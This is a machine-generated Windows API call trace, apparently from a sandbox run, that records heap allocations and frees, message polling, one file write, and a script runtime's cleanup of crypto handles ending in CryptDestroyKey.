[0243.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db8) returned 0x2f14818 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f18398 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0243.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db8) returned 0x2f18398 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0243.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf7750 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf5990 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0243.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf3bd0 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f165d8 | out: hHeap=0x970000) returned 1 [0243.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1e10 | out: hHeap=0x970000) returned 1 [0243.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0243.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db8) returned 0x2f14818 [0243.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f18398 | out: hHeap=0x970000) returned 1 [0243.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0243.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db8) returned 0x3bf0050 [0243.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.535] WriteFile (in: hFile=0x2d0, lpBuffer=0x3bf0050*, nNumberOfBytesToWrite=0x1db8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf0050*, lpNumberOfBytesWritten=0x8cf5e4*=0x1db8, lpOverlapped=0x0) returned 1 [0243.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0243.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0243.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.584] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0243.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0243.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0243.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0243.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0243.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0243.585] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0243.585] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0243.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0243.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.586] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0243.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0243.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0243.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e510e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0243.587] CryptDestroyKey (hKey=0xa87350) returned 1 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0243.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0243.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0243.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0243.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0243.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0243.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0243.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0243.589] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0243.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.590] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0243.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0243.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.590] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0243.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0243.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0243.590] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0243.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0243.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0243.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0243.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0243.591] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0243.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0243.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 